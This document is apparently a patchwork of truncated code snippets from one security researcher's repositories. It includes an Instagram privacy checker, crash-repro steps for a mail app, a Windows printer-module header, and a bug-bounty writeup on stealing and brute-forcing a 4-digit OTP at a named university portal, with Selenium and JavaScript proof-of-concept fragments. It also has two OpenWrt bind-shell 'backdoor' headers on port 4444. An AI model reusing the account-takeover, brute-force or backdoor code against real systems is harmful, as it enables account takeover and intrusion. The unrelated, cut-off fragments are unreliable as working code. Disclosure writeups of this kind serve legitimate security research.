```python
import requests, bs4

def checker(username):
    r = requests.get('https://instagram.com/' + str(username))
    html = str(r.content)
    if 'private":true' in html:
        return True
    elif 'private":false' in html:
        return False
    else:
```

1. Open the Mail.com Android app (version=6.1.4), then go to "Add Account".
2. Click on it.
3. Log in. (Dummy credentials, type anything.)
4. Click on the eye icon, which allows users to show the password behind the asterisks.
5. Click on the password textbox again.
6. Boom, app force stop.

```cpp
/***********************************************************
win32printmodule.cpp -- module for interface into printer API
Note that this source file contains embedded documentation.
This documentation consists of marked up text inside the
C comments, and is prefixed with an '@' symbol. The source
files are processed by a tool called "autoduck" which
generates Windows .hlp files.
```

```
# Author : PIYUSH RAJ (0x48piraj)
# Impact : Taking control over any account (both parent's & student's) via exposed OTP (One Time Password) pin on client's side
# Vulnerability : Improper handling of sensitive data
# Target : dms.jaipur.manipal.edu
# Exploit: Javascript Injection (Proof-of-Concept provided)
# Patched : Yes (Reported on https://bounty.jaipur.manipal.edu)
# Vulnerable parameters :
    - hdnOTP
    - hdnStudentOTP
```

```python
#!/usr/bin/python
import sys
from selenium import webdriver

# Author : PIYUSH RAJ (0x48piraj)
# Proof-of-Concept (POC) : Python 3

driver = webdriver.Firefox()
driver.get("https://dms.jaipur.manipal.edu/loginForm.aspx")
```

```javascript
// Author : PIYUSH RAJ (0x48piraj)
// Proof-of-Concept (POC) : Javascript
function sleepFor( sleepDuration ){
    var now = new Date().getTime();
    while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function check(combo){
    document.getElementById("TxtStduentOTP").value = combo;
```

```
# Author : PIYUSH RAJ (0x48piraj)
# Impact : Bruteforcing OTP PIN Efficiently (With POC)
# Vulnerability : No lock-out policy
# Exploit: Seq. Bruteforce Attack (Proof-of-Concept provided)

Vulnerability :

Because no lock-out policy is enabled, the OTP can be brute-forced. What makes it easy to brute-force is the password strength: it consists of only 4 digits.
This makes a total of 10,000 combinations. What's more interesting is that the generated OTP PIN always has a value of 1000 or above, which reduces the total number of combinations by 1000,
leaving only 9000.
```

```c
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdlib.h>

#define BACKDOOR_PORT 4444

/* Author: Piyush Raj (0x48piraj)
 * Bind Shell for OpenWrt 18.06 firmware, handles one connection per execution
 * Arch : i486
 * ./i486-openwrt-linux-musl-gcc bindshell-unstable.c -o bindshell
 */
```

```bash
#!/bin/bash

###############################################################
# Author : Piyush Raj <0x48piraj>                             #
# Info : Auto Node Packages Vulnerability Resolver            #
###############################################################

# Print each option on its own line (printf does not append a newline itself).
printf "[*] Organisation => orgs\n"
printf "[*] Individual => users\n"
```

```c
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdlib.h>

#define BACKDOOR_PORT 4444

/* Author: Piyush Raj (0x48piraj)
 * Bind Shell for OpenWrt 18.06 firmware
 * Arch : i486
 * ./i486-openwrt-linux-musl-gcc bindshell-stable.c -o bindshell
 */
```